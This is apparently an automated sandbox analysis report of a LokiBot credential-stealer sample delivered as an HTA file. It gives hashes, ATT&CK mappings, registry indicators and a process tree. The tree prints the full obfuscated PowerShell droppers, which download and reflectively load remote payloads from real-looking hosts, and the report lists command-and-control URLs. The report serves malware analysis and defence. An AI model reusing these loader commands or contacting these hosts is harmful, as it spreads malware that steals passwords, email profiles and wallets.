lokibot | 5c7f1d6ac7671a1b1764dba808cf52f5c5c48ce1cbd0f1c16d8f6cf0afe5d3c8

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-11-2024 07:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5c7f1d6ac7671a1b1764dba808cf52f5c5c48ce1cbd0f1c16d8f6cf0afe5d3c8.hta
Size

178KB
MD5

43f15554d66e784d988aa2da3ed2a136
SHA1

6d0fb362a8aa62a046e25435e6a525e2ca61492d
SHA256

5c7f1d6ac7671a1b1764dba808cf52f5c5c48ce1cbd0f1c16d8f6cf0afe5d3c8
SHA512

2c06f6a513bd10d648dfec384fc1056b0e8f39a830e0671f9098961076de61ac7db5e0dc7724a7ffd403a4769b90324aeb785d0b16c13dfe7dd24342a9460cd9
SSDEEP

96:4vCl17J1YiZVGTVy1YiZQGTVMFxfwVXNewJrC1YiZo1YiZDjGTVs1YiZkQ:4vCldfhjGTOheGTqHwShohxjGTYhuQ

Score

10^/10

lokibot collection defense_evasion discovery execution spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

lokibot

http://94.156.177.95/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot

Blocklisted process makes network request 3 IoCs

flow	pid	Process
13	3940	poWErSHELL.EXE
18	3184	powershell.exe
23	3184	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2012	powershell.exe
3184	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
3940	poWErSHELL.EXE
1900	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	aspnet_compiler.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	aspnet_compiler.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	aspnet_compiler.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3184 set thread context of 4652	3184	powershell.exe	106

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	poWErSHELL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3940	poWErSHELL.EXE
3940	poWErSHELL.EXE
1900	powershell.exe
1900	powershell.exe
2012	powershell.exe
2012	powershell.exe
3184	powershell.exe
3184	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3940	poWErSHELL.EXE
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeDebugPrivilege	4652	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 348 wrote to memory of 3940	348	mshta.exe	85
PID 348 wrote to memory of 3940	348	mshta.exe	85
PID 348 wrote to memory of 3940	348	mshta.exe	85
PID 3940 wrote to memory of 1900	3940	poWErSHELL.EXE	88
PID 3940 wrote to memory of 1900	3940	poWErSHELL.EXE	88
PID 3940 wrote to memory of 1900	3940	poWErSHELL.EXE	88
PID 3940 wrote to memory of 4224	3940	poWErSHELL.EXE	93
PID 3940 wrote to memory of 4224	3940	poWErSHELL.EXE	93
PID 3940 wrote to memory of 4224	3940	poWErSHELL.EXE	93
PID 4224 wrote to memory of 4516	4224	csc.exe	94
PID 4224 wrote to memory of 4516	4224	csc.exe	94
PID 4224 wrote to memory of 4516	4224	csc.exe	94
PID 3940 wrote to memory of 404	3940	poWErSHELL.EXE	98
PID 3940 wrote to memory of 404	3940	poWErSHELL.EXE	98
PID 3940 wrote to memory of 404	3940	poWErSHELL.EXE	98
PID 404 wrote to memory of 2012	404	WScript.exe	99
PID 404 wrote to memory of 2012	404	WScript.exe	99
PID 404 wrote to memory of 2012	404	WScript.exe	99
PID 2012 wrote to memory of 3184	2012	powershell.exe	104
PID 2012 wrote to memory of 3184	2012	powershell.exe	104
PID 2012 wrote to memory of 3184	2012	powershell.exe	104
PID 3184 wrote to memory of 4652	3184	powershell.exe	106
PID 3184 wrote to memory of 4652	3184	powershell.exe	106
PID 3184 wrote to memory of 4652	3184	powershell.exe	106
PID 3184 wrote to memory of 4652	3184	powershell.exe	106
PID 3184 wrote to memory of 4652	3184	powershell.exe	106
PID 3184 wrote to memory of 4652	3184	powershell.exe	106
PID 3184 wrote to memory of 4652	3184	powershell.exe	106
PID 3184 wrote to memory of 4652	3184	powershell.exe	106
PID 3184 wrote to memory of 4652	3184	powershell.exe	106

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	aspnet_compiler.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	aspnet_compiler.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5c7f1d6ac7671a1b1764dba808cf52f5c5c48ce1cbd0f1c16d8f6cf0afe5d3c8.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:348
- C:\Windows\SysWOW64\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE
  "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3940
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1900
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4xhr3a0b\4xhr3a0b.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4224
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7129.tmp" "c:\Users\Admin\AppData\Local\Temp\4xhr3a0b\CSC60BBEEFD0D4594902660437A7E08C.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4516
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:404
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2012
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3184
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:4652

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\poWErSHELL.EXE.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
96160a90b541ce0bd95382f2d5a23d8c

SHA1
f4e2291c9cc8b136d7e107bd9f8a426ac020d91a

SHA256
a34888e243a673359be8c17d16f887d01f01304bd0d2e9647e6e5f21dc699ba3

SHA512
6d1d4b5467c58460ee525cee0e4caf716b1a49f289373f265c407f2765718dc54a3c478b52ddb932c023863866314a5cabe4645c5757eb2c540888490c3b2659

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
a2a791ec6c757085667e85acf263b91e

SHA1
6ceb66682fab73c42ab199ef9c1a02c5245ba406

SHA256
584a65ac5b10614c68310dbadee48c6fd124341237dafaef1b12e61dcbf1c59a

SHA512
5c4c973a350a881456076b40bfa5995ed3689f769b973baf561365d8342a5e50e274b30078d0d9bd5de59db38b8ad2861d188cac9e51a3b90dc910939392ff29

Download Submit
C:\Users\Admin\AppData\Local\Temp\4xhr3a0b\4xhr3a0b.dll

Filesize
3KB

MD5
2bba88476d4b23478cc9874995f5299e

SHA1
236165a02bfef8bcc1176e8c41a775ec0865d19a

SHA256
4002060ffd83fbd4108c08e0573efe5533a3719d796855cbfc02c55668b16bbf

SHA512
2586ec81d306eebb64a872ecfe56546c561b3fbc88e3a8c2fd530465877adccd469a8cf0f4cd0d1607f5fefe8810e4f4394c354c10d7bb3a10d14d8331986002

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7129.tmp

Filesize
1KB

MD5
69aa9f9e2d3cc9dcec6971b5d2d94e90

SHA1
b25109225d81985066ff5d3805564270bd022d7c

SHA256
725ad2fb68864a205fb9853c2a05efd8d238ddebc34589ebb4403f562aa62d84

SHA512
305e9058a8a539188b2cce5a1efa95fc052cf7b1b21e947615b9d51aaaa19d5a903820e0551a28d65ef6df977b52b543a0b43965ae8ba059b3f100f737a0fe83

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5l4n0ln.kzy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-493223053-2004649691-1575712786-1000\0f5007522459c86e95ffcc62f32308f1_755b0f1a-bb38-4bb2-bc7e-240c892146ee

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-493223053-2004649691-1575712786-1000\0f5007522459c86e95ffcc62f32308f1_755b0f1a-bb38-4bb2-bc7e-240c892146ee

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS

Filesize
138KB

MD5
100d059d24305dc95db276aa180dc4cf

SHA1
cb2e9d345f365a0dc65b61cf40865b223c4688ad

SHA256
87be9d53a554146bcbab91270c1ef35561f5168e6f84ea86c26d23b4c803247d

SHA512
14f70627cbb1adbb26d511d92558c471ca5354a1d0fa54a33d22d7c4933b6e1873871750f53318cd9c8d4e8b3f7627bac2f4bac3f295a67e2d35756ad951c8f5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4xhr3a0b\4xhr3a0b.0.cs

Filesize
476B

MD5
405282350b57e6d41b6d58a029558c64

SHA1
6c50ec9dd86fa438a3bc1af48a3b49f1bc364e49

SHA256
11a1bdc49e30fac7bc2cbebd22d8f4f072a449141ddd7e197f85ccb2ab331506

SHA512
5f45c0c1451fe0c044138c44b3708baf9468df7d91d1201dc05fcef629f9cab8fd9f66cc14a37c62a189829f1de22d4a1135813226bff45181283f59706de351

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4xhr3a0b\4xhr3a0b.cmdline

Filesize
369B

MD5
1cf84c42db914f660247e6d04fd74976

SHA1
ab9e32e1ddb6234e4700caec3d18dea53f093c05

SHA256
f4494711a06a01215a80b0b562564086dfc31408b03d5941e55228f3b2715490

SHA512
4f6dcf2e37d031675c9e72a011ec76e67a1144b2d30c4c2e268664c1c9ddcf89b70259d1f273c354e8977a2b562dad3f72cff8861093aa0cc7ffcff787311584

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4xhr3a0b\CSC60BBEEFD0D4594902660437A7E08C.TMP

Filesize
652B

MD5
c388a7c91b58f68247a6544107732ce0

SHA1
7160c4aed30ad89bf4930e94a76c4214a0d5f77c

SHA256
e01da93c12337950995ee83305e22a6587fa496fa8813200b46efb46a1ec83e2

SHA512
80e90b7ae104d67b2eca4891aae4b4041b0e67aba66b4d3d062c7b5ca589df92707368a6606ba37ab2acefe239cc8ea0d7a24c8c83eecf06fe9d7d53b75f0e92

Download Submit
memory/1900-48-0x0000000007670000-0x0000000007684000-memory.dmp

Filesize
80KB

Download
memory/1900-29-0x00000000070B0000-0x00000000070E2000-memory.dmp

Filesize
200KB

Download
memory/1900-40-0x0000000007090000-0x00000000070AE000-memory.dmp

Filesize
120KB

Download
memory/1900-41-0x00000000072F0000-0x0000000007393000-memory.dmp

Filesize
652KB

Download
memory/1900-42-0x0000000007A70000-0x00000000080EA000-memory.dmp

Filesize
6.5MB

Download
memory/1900-43-0x0000000007430000-0x000000000744A000-memory.dmp

Filesize
104KB

Download
memory/1900-44-0x0000000007490000-0x000000000749A000-memory.dmp

Filesize
40KB

Download
memory/1900-45-0x00000000076C0000-0x0000000007756000-memory.dmp

Filesize
600KB

Download
memory/1900-46-0x0000000007630000-0x0000000007641000-memory.dmp

Filesize
68KB

Download
memory/1900-47-0x0000000007660000-0x000000000766E000-memory.dmp

Filesize
56KB

Download
memory/1900-30-0x000000006DCB0000-0x000000006DCFC000-memory.dmp

Filesize
304KB

Download
memory/1900-49-0x0000000007780000-0x000000000779A000-memory.dmp

Filesize
104KB

Download
memory/1900-50-0x00000000076B0000-0x00000000076B8000-memory.dmp

Filesize
32KB

Download
memory/2012-88-0x0000000005810000-0x0000000005B64000-memory.dmp

Filesize
3.3MB

Download
memory/3184-99-0x0000000007D50000-0x0000000007EA8000-memory.dmp

Filesize
1.3MB

Download
memory/3184-100-0x0000000007F50000-0x0000000007FEC000-memory.dmp

Filesize
624KB

Download
memory/3940-78-0x00000000713F0000-0x0000000071BA0000-memory.dmp

Filesize
7.7MB

Download
memory/3940-0-0x00000000713FE000-0x00000000713FF000-memory.dmp

Filesize
4KB

Download
memory/3940-65-0x0000000006200000-0x0000000006208000-memory.dmp

Filesize
32KB

Download
memory/3940-71-0x00000000713FE000-0x00000000713FF000-memory.dmp

Filesize
4KB

Download
memory/3940-72-0x00000000713F0000-0x0000000071BA0000-memory.dmp

Filesize
7.7MB

Download
memory/3940-7-0x0000000005440000-0x00000000054A6000-memory.dmp

Filesize
408KB

Download
memory/3940-5-0x0000000004CD0000-0x0000000004CF2000-memory.dmp

Filesize
136KB

Download
memory/3940-4-0x00000000713F0000-0x0000000071BA0000-memory.dmp

Filesize
7.7MB

Download
memory/3940-19-0x0000000005CD0000-0x0000000005D1C000-memory.dmp

Filesize
304KB

Download
memory/3940-6-0x00000000053D0000-0x0000000005436000-memory.dmp

Filesize
408KB

Download
memory/3940-13-0x0000000005670000-0x00000000059C4000-memory.dmp

Filesize
3.3MB

Download
